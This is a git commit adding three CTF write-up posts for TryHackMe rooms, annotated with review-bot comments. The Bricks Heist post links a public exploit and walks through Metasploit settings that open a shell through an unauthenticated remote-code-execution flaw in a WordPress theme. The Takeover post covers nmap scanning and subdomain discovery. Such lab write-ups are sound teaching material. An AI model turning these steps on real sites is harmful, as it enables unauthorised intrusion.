Add files via upload

This commit is contained in:
Amca 2024-12-19 10:18:30 +08:00 committed by GitHub
parent 50d65a74e3
commit 623c4fa3f6
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
3 changed files with 230 additions and 0 deletions


@ -0,0 +1,10 @@
---
title: 'TryHackMe: Publisher'
author: AmcaQt
categories: [TryHackMe]
tags: [web, enumeration, subdomain, subdomain takeover]
render_with_liquid: false
media_subpath: /images/thm_publisher/
image:
path: room_card.png
---
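Review bot: the Publisher post is front matter only: after the closing `---` there is no body, so the site will publish an empty page titled "TryHackMe: Publisher" with a room card and nothing under it. Either add the write-up before this lands or leave the file out of the commit. Also worth checking: its tags line, `tags: [web, enumeration, subdomain, subdomain takeover]`, is identical to the Takeover post's tags, which looks like a copy-paste carried over from that file; confirm those tags actually describe the Publisher room.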


@ -0,0 +1,119 @@
---
title: 'TryHackMe: TryHack3M: Bricks Heist'
author: AmcaQt
categories: [TryHackMe]
tags: [web, enumeration, rce]
render_with_liquid: false
media_subpath: /images/thm_bricks_heist/
image:
path: room_card.png
---
![Tryhackme Room Link](room_image.PNG){: width="600" height="150" .shadow }
_<https://tryhackme.com/r/room/tryhack3mbricksheist>_
## Description
Brick Press Media Co. was working on creating a brand-new web theme that represents a renowned wall using three million byte bricks. Agent Murphy comes with a streak of bad luck. And here we go again: the server is compromised, and they've lost access.
Can you hack back the server and identify what happened there?
Note : Add `MACHINE_IP bricks.thm` to your /etc/hosts file.
## Question & Flag
### What is the content of the hidden .txt file in the web folder?
First, before do further enumaration, let's run the basic scan with nmap
![Nmap Scan](scan.PNG)
Interesting find here, without wasting any time let's look further with [**WpScan**](https://www.kali.org/tools/wpscan/)
![](2.PNG)
The scan shows the site using Theme `bricks` with version `1.9.5`, after some research and finding we found the version is Vuln to Unauthenticated RCE
![Remote Code Execution](3.PNG)
The exploit and cve for the version is on github but i want to use metasploit to speed up the exploit
> https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
Power up your msfconsole and search for bricks, you shall find the matching modules
![](4.PNG)
simply use command use 0 and fill in the require and you shall get the shell
![](5.PNG)
```Command
set LHOST 10.8.58.21
set RHOSTS https://bricks.thm
set RPORT 443
run
```
with that you may find the answer for Task 1
![](6.jpg)
### What is the name of the suspicious process? & What is the service name affiliated with the suspicious process?
For this one go to google and do some research about it , then you'll found the command
![](systemctl.PNG)
get back to the terminal and try out the command
![](7.PNG)
but this is not the answer, let's try view the content of the service
![](8.jpg)
That's what we want
### What is the log file name of the miner instance?
Notice that the service is executing from `/lib/NetworkManager/` directory, go to that directory
![](9.jpg)
### What is the wallet address of the miner instance? & The wallet address used has been involved in transactions between wallets belonging to which threat group?
Using the strings on the log file that we view earlier, try to decode with [**CyberChef**](https://gchq.github.io/CyberChef/)
![](10.PNG)
kinda lost on what that is, but since we searched about wallet address so i did some research
![](wallet.PNG)
so i need to confirm it, go to [**Blockchair**](https://blockchair.com/) , lucky it was the correct one, so i went down to the last payment received
![](11.PNG)
Inside that transaction history and from there, inside the privacy check
![](12.PNG)
We can see the details on the transaction
![](13.PNG)
Copy the sender address and search it on google, most of the result return `LockBit`
> Source :
>
> https://ofac.treasury.gov/recent-actions/20240220
>
> https://www.chainalysis.com/blog/lockbit-takedown-sanctions-february-2024/
## Conclusion
This was fun Room and good for beginner to learn about `CVE` and how risky Outdated version of CMS such as `WordPress`.
# Happy Hacking
![Cute Gif](https://i.pinimg.com/originals/c6/ad/84/c6ad8481cee4f75d464b2a14040d06c9.gif)
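Review bot: the exploitation step in the Bricks Heist post depends on `use 0` after searching for "bricks", which picks whatever happens to be first in the search results on the author's install; on another Metasploit version, or with extra modules loaded, index 0 can be a different module. Give the module by its full path as shown in the search screenshot (`use exploit/...`) so readers select the same module, and name the CVE in the prose rather than only inside the GitHub URL `CVE-2024-25600-EXPLOIT`, since the post's conclusion is precisely that readers should learn about CVEs. Two smaller points: the nmap and WPScan commands, the `systemctl` lookup for the suspicious service and the log-file decode step ("try to decode with CyberChef", without saying which encoding) exist only as screenshots, so nothing can be copied or reproduced; paste the command text the way the Takeover post does for its nmap output, and state the encoding used. Minor spelling: "enumaration" should be "enumeration", and "This was fun Room and good for beginner" reads better as "This was a fun room and good for beginners".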


@ -0,0 +1,101 @@
---
title: 'TryHackMe: Takeover'
author: AmcaQt
categories: [TryHackMe]
tags: [web, enumeration, subdomain, subdomain takeover]
render_with_liquid: false
media_subpath: /images/thm_takeover/
image:
path: room_card.png
---
![Tryhackme Room Link](room_image.PNG){: width="600" height="150" .shadow }
_<https://tryhackme.com/room/takeover>_
## Description
Hello there,
I am the CEO and one of the co-founders of futurevera.thm. In Futurevera, we believe that the future is in space. We do a lot of space research and write blogs about it. We used to help students with space questions, but we are rebuilding our support.
Recently blackhat hackers approached us saying they could takeover and are asking us for a big ransom. Please help us to find what they can takeover.
Our website is located at https://futurevera.thm
Hint: Don't forget to add the MACHINE_IP in /etc/hosts for futurevera.thm ; )
## Basic Scan
As usual we've been given a MACHINE_IP and need to put it on `/etc/hosts` with a named `futurevera.thm`. Lets run basic scan using Nmap
```Nmap Scan
┌──(amca㉿amcaqt)-[~]
└─$ nmap -A -T5 futurevera.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 14:19 +08
Warning: 10.10.200.103 giving up on port because retransmission cap hit (2).
Nmap scan report for futurevera.thm (10.10.200.103)
Host is up (0.20s latency).
Not shown: 910 closed tcp ports (conn-refused), 87 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 dd:29:a7:0c:05:69:1f:f6:26:0a:d9:28:cd:40:f0:20 (RSA)
| 256 cb:2e:a8:6d:03:66:e9:70:eb:96:e1:f5:ba:25:cb:4e (ECDSA)
|_ 256 50:d3:4b:a8:a2:4d:1d:79:e1:7d:ac:bb:ff:0b:24:13 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to https://futurevera.thm/
|_http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.41
| ssl-cert: Subject: commonName=futurevera.thm/organizationName=Futurevera/stateOrProvinceName=Oregon/countryName=US
| Not valid before: 2022-03-13T10:05:19
|_Not valid after: 2023-03-13T10:05:19
|_http-title: FutureVera
|_http-server-header: Apache/2.4.41 (Ubuntu)
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.43 seconds
```
We foundd that there's 3 open port which is :
`22` ssh
`80` http
`443` ssl/http
### Subdomain Enumaration
#### First Subdomain
The Description mention `support`, which I assume they have `support` as their subdomain, so lets add that in `/etc/hosts` and looks what we can find on that subdomain. View the subdomain on firefox and shall find this :
![First Subdomain](1st-subdo.PNG)
#### Second Subdomain
By clicking the `View Cerificate` you shall find info about the subdomain `support.futurevera.thm`. If you a little lower you'll find Subject Alternative Names with DNS Names `s******************2.support.futurevera.htm` and as usual add the DNS Names in `/etc/hosts`
![Second Subdomain](2nd-subdo.jpg)
### What's the value of the flag?
By viewing the DNS Names on the browser you'll obtain the flag and will be redirect to [AWS Web Server](https://www.geeksforgeeks.org/aws-cloud-architecture-for-web-hosting/).
![Flag](flag.jpg)
### Conclusion
This room was fun and very interesting, it made me search and try to understand what is `Subdomain takeover`, and learned something new with this room.
If you want to learn more about `Subdomain Takeover`
- [Book.Hacktricks.xyz](https://book.hacktricks.xyz/pentesting-web/domain-subdomain-takeover)
- [HackerOne](https://www.hackerone.com/application-security/guide-subdomain-takeovers)
- [Developer.Mozilla](https://developer.mozilla.org/en-US/docs/Web/Security/Subdomain_takeovers)
## Happy Hacking
![](https://media1.tenor.com/m/aXVFqv8KInAAAAAC/anime-frieren.gif){: width="600" height="150" .shadow }
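Review bot: the nmap run in the Takeover post uses `-T5`, and its own output shows the cost: `Warning: 10.10.200.103 giving up on port because retransmission cap hit (2).` followed by 87 ports reported as "filtered tcp ports (no-response)" against a host with 0.20s latency. Over a VPN at that latency those are more likely dropped probes than filtered ports, so the scan may have missed services; rerun with `-T4` (or the default timing) before presenting the three-port result as complete, or at least add a sentence that the filtered count is a timing artefact. In the Subject Alternative Name step the redacted hostname is written as `s******************2.support.futurevera.htm`: the TLD should be `.thm`, matching `futurevera.thm` everywhere else in the post, otherwise readers copying it into `/etc/hosts` get a name that never resolves. The flag step says visiting that name "will be redirect to AWS Web Server" and links a generic GeeksforGeeks hosting article; since the room is about the takeover condition, state what the subdomain actually resolves to and why that resource can be claimed by an attacker, and point the link at one of the takeover references already listed in the conclusion rather than an AWS architecture overview. Minor spelling and grammar: "foundd", "Cerificate", "Enumaration", and "If you a little lower" (missing "scroll").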